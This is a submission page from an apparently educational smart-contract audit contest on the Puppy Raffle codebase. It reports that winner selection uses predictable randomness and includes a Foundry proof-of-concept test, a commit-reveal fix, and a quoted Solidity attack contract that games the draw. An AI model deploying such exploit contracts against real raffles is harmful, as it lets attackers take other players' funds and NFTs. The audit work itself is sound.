Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

MEV Bots Can Front-Run Winner Selection for Guaranteed Profits

365smile

Scope: src/PuppyRaffle.sol

Root + Impact

Since the randomness source includes msg.sender and is predictable, MEV bots can observe pending transactions, calculate which caller address produces their desired winner, and front-run with their own call.

Description

Normal behavior: The raffle should fairly select a winner without external manipulation.
The issue: Different msg.sender values produce different winners. MEV bots can try thousands of addresses off-chain to find one that makes their entry win, then call from that address.

function selectWinner() external {

// @> msg.sender controls the outcome

// @> MEV bots calculate winning caller address off-chain

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

}

Risk

Likelihood:

MEV bots actively monitor mempools for profitable transactions
Calculation is trivial and can be done off-chain instantly
Block builders have full control over transaction ordering

Impact:

Legitimate winner selection can be overridden
MEV extraction from every raffle
Unfair advantage to technically sophisticated actors

Proof of Concept

Explanation: The test shows that by iterating through different caller addresses, we can find one that makes any specific player (e.g., playerFour) win. This is exactly what an MEV bot would do to guarantee their entry wins.

function testVuln9_FrontRunning() public {

address[] memory players = new address[](4);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

players[3] = playerFour;

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

vm.warp(block.timestamp + duration + 1);

// MEV bot finds caller address that makes playerFour win

address botCaller;

for (uint160 i = 1; i < 1000; i++) {

address testCaller = address(i);

uint256 winnerIdx = uint256(

keccak256(abi.encodePacked(testCaller, block.timestamp, block.difficulty))

) % 4;

if (puppyRaffle.players(winnerIdx) == playerFour) {

botCaller = testCaller;

break;

}

assertTrue(botCaller != address(0));

// Bot calls from that address - playerFour guaranteed to win

vm.prank(botCaller);

puppyRaffle.selectWinner();

assertEq(puppyRaffle.previousWinner(), playerFour);

}

Recommended Mitigation

Explanation: Use commit-reveal scheme or Chainlink VRF where the randomness cannot be influenced by the caller. Remove msg.sender from the randomness calculation entirely.

+ // Use commit-reveal: user commits hash, then reveals after delay

+ mapping(address => bytes32) public commitments;

+ uint256 public revealBlock;

+ function commitSelection(bytes32 commitment) external {

+ commitments[msg.sender] = commitment;

+ revealBlock = block.number + 10; // Must wait 10 blocks

+ }

+ function revealAndSelectWinner(uint256 secret) external {

+ require(block.number >= revealBlock, "Too early");

+ require(keccak256(abi.encodePacked(secret)) == commitments[msg.sender], "Invalid");

+ // Use committed secret + future blockhash for randomness

+ uint256 winnerIndex = uint256(keccak256(abi.encodePacked(

+ secret,

+ blockhash(revealBlock)

+ ))) % players.length;

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!